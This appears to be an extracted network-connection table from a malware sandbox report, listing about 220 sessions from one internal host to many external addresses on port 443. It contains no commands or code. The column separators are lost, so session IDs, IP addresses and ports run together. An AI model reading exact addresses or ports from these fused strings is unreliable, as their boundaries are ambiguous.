                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21942192.168.2.2337818154.197.83.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21943192.168.2.235317637.2.194.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21944192.168.2.234111072.241.102.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21945192.168.2.2336676122.10.175.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21946192.168.2.2338428138.229.11.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21947192.168.2.234847647.214.163.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21948192.168.2.2335700151.25.190.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21949192.168.2.234254663.234.18.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21950192.168.2.2351258181.76.59.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21951192.168.2.234331869.209.62.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21952192.168.2.235477271.252.54.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21953192.168.2.2340506206.91.7.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21954192.168.2.2356104171.58.185.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21955192.168.2.235656066.212.54.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21956192.168.2.2356126110.111.92.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21957192.168.2.2333390209.147.42.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21958192.168.2.233420643.224.164.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21959192.168.2.2350538218.158.16.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21960192.168.2.2346120181.161.13.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21961192.168.2.2358730135.26.108.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21962192.168.2.2344646221.54.87.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21963192.168.2.2339648108.100.19.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21964192.168.2.2347484177.136.182.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21965192.168.2.235462482.222.60.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21966192.168.2.235938447.198.199.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21967192.168.2.2334362195.217.9.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21968192.168.2.2339752168.146.27.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21969192.168.2.2356136110.54.124.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21970192.168.2.2341812181.203.118.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21971192.168.2.2341520103.188.233.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21972192.168.2.2353026210.120.147.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21973192.168.2.2343070209.131.76.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21974192.168.2.234752044.215.33.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21975192.168.2.2358472106.143.241.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21976192.168.2.2359776137.3.156.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21977192.168.2.233821099.6.195.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21978192.168.2.2335036222.101.79.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21979192.168.2.236043427.87.60.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21980192.168.2.234341217.185.105.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21981192.168.2.2334298166.156.207.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21982192.168.2.2356510175.131.35.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21983192.168.2.234907876.81.253.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21984192.168.2.2335932102.54.203.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21985192.168.2.2340656126.32.132.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21986192.168.2.2349328195.247.21.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21987192.168.2.233510298.225.112.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21988192.168.2.2333906204.28.207.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21989192.168.2.2333608196.251.36.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21990192.168.2.235381480.78.37.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21991192.168.2.233578444.143.233.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21992192.168.2.234539851.78.245.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21993192.168.2.2347284203.205.70.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21994192.168.2.2353262120.69.189.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21995192.168.2.2352728213.3.12.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21996192.168.2.2348050144.242.78.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21997192.168.2.2335056190.216.255.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21998192.168.2.235904652.181.138.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21999192.168.2.234788853.172.181.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22000192.168.2.23427001.199.230.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22001192.168.2.2342760191.101.50.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22002192.168.2.234954094.142.171.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22003192.168.2.234912253.244.151.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22004192.168.2.234490614.149.0.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22005192.168.2.2350204213.218.44.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22006192.168.2.2342178113.238.180.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22007192.168.2.2340824160.221.130.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22008192.168.2.235547059.229.67.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22009192.168.2.2355632130.79.147.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22010192.168.2.2332814165.65.3.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22011192.168.2.235105894.220.243.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22012192.168.2.2339438134.221.162.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22013192.168.2.234040052.252.70.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22014192.168.2.235889281.243.205.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22015192.168.2.2335136160.41.24.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22016192.168.2.2336632216.52.107.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22017192.168.2.2342758109.240.208.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22018192.168.2.2338730123.198.220.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22019192.168.2.2350750198.166.146.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22020192.168.2.235545498.155.110.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22021192.168.2.2355470167.253.169.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22022192.168.2.2353670160.222.53.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22023192.168.2.2333120206.174.159.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22024192.168.2.233717861.211.159.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22025192.168.2.2343448135.186.40.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22026192.168.2.235925079.179.106.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22027192.168.2.233952462.175.155.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22028192.168.2.2353066154.35.255.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22029192.168.2.235105686.244.60.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22030192.168.2.2340422161.85.103.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22031192.168.2.235686890.247.166.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22032192.168.2.234810243.187.7.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22033192.168.2.2349660121.93.9.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22034192.168.2.2338318216.90.59.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22035192.168.2.233853681.64.112.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22036192.168.2.2348086183.174.238.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22037192.168.2.235974014.240.159.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22038192.168.2.2341764212.75.18.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22039192.168.2.235663862.187.94.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22040192.168.2.234074479.36.210.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22041192.168.2.2353248196.197.182.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22042192.168.2.2340848205.242.7.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22043192.168.2.2352900134.125.152.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22044192.168.2.234263063.130.223.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22045192.168.2.2335272155.179.201.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22046192.168.2.235124052.143.52.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22047192.168.2.234239214.24.173.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22048192.168.2.2334758104.40.204.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22049192.168.2.2358296129.255.108.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22050192.168.2.235979058.31.4.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22051192.168.2.236067851.109.125.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22052192.168.2.2339282110.253.138.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22053192.168.2.235064082.159.112.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22054192.168.2.2352068206.238.122.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22055192.168.2.2345974188.255.20.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22056192.168.2.236043431.17.117.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22057192.168.2.2352052139.193.102.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22058192.168.2.233322434.159.187.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22059192.168.2.2349232222.101.135.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22060192.168.2.233651075.165.19.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22061192.168.2.233287265.236.223.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22062192.168.2.2339430125.99.97.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22063192.168.2.2333092209.128.161.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22064192.168.2.2336102149.237.7.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22065192.168.2.2346916165.160.82.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22066192.168.2.234269886.224.153.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22067192.168.2.234713449.10.60.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22068192.168.2.233921272.197.54.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22069192.168.2.235512031.200.33.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22070192.168.2.2354148221.98.246.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22071192.168.2.234987076.121.247.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22072192.168.2.2349670103.71.251.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22073192.168.2.235157036.92.113.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22074192.168.2.2357334147.75.155.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22075192.168.2.234777635.151.68.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22076192.168.2.2354628144.124.183.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22077192.168.2.2358752221.148.214.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22078192.168.2.234228694.160.73.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22079192.168.2.234446297.187.58.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22080192.168.2.2344090218.169.191.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22081192.168.2.2359246159.98.241.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22082192.168.2.2349844113.9.70.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22083192.168.2.234782490.30.166.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22084192.168.2.2339236211.37.58.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22085192.168.2.23443121.195.199.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22086192.168.2.2335494158.96.77.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22087192.168.2.2348156196.32.98.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22088192.168.2.2336828167.49.216.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22089192.168.2.2337576217.234.69.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22090192.168.2.2351624125.57.65.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22091192.168.2.233642818.139.163.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22092192.168.2.234224647.140.205.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22093192.168.2.2345120154.119.140.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22094192.168.2.2334766217.14.97.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22095192.168.2.234888486.53.67.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22096192.168.2.2352402146.172.110.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22097192.168.2.2346738156.235.78.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22098192.168.2.235534624.110.21.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22099192.168.2.2353622149.167.67.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22100192.168.2.235129840.115.205.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22101192.168.2.2332962139.36.180.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22102192.168.2.2357320139.193.107.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22103192.168.2.2349186194.105.180.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22104192.168.2.2342694152.87.115.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22105192.168.2.2355036161.93.37.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22106192.168.2.2348832130.136.146.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22107192.168.2.233835053.207.133.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22108192.168.2.2350674183.46.195.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22109192.168.2.2337414147.207.157.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22110192.168.2.234024020.106.2.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22111192.168.2.2338300149.119.100.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22112192.168.2.2350004125.17.240.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22113192.168.2.2345930186.41.3.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22114192.168.2.234200488.146.219.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22115192.168.2.233409076.128.5.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22116192.168.2.234927048.32.114.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22117192.168.2.236070863.182.13.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22118192.168.2.23587345.74.186.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22119192.168.2.233890674.224.205.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22120192.168.2.2346626197.193.225.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22121192.168.2.235778278.59.82.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22122192.168.2.2353996109.24.64.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22123192.168.2.236004062.186.71.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22124192.168.2.235558467.26.107.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22125192.168.2.2341726103.82.215.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22126192.168.2.2333808211.84.73.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22127192.168.2.2353238168.221.105.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22128192.168.2.234493042.141.66.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22129192.168.2.2355786145.100.233.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22130192.168.2.235852223.248.170.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22131192.168.2.2343466181.25.169.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22132192.168.2.2347852157.99.54.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22133192.168.2.235445063.168.225.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22134192.168.2.2351928110.214.230.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22135192.168.2.2350204168.118.251.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22136192.168.2.2349810210.8.207.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22137192.168.2.2342012204.112.33.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22138192.168.2.2352468182.97.171.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22139192.168.2.2347210161.95.204.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22140192.168.2.2345414149.158.174.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22141192.168.2.2345156132.202.148.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22142192.168.2.2354028163.240.131.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22143192.168.2.2352888125.110.63.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22144192.168.2.234966017.248.67.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22145192.168.2.2340836117.91.101.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22146192.168.2.2345822178.66.8.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22147192.168.2.2352928104.136.63.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22148192.168.2.2334662133.134.210.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22149192.168.2.235228080.52.11.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22150192.168.2.2341588188.91.4.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22151192.168.2.233581043.37.26.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22152192.168.2.2350374109.25.238.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22153192.168.2.234923270.145.59.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22154192.168.2.2358116182.3.96.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22155192.168.2.2336986211.111.74.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22156192.168.2.234596269.157.123.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22157192.168.2.235271037.12.222.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22158192.168.2.233888032.97.137.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22159192.168.2.235384667.177.94.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22160192.168.2.2350382105.219.178.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22161192.168.2.2360954205.234.33.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22162192.168.2.2350070172.227.61.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
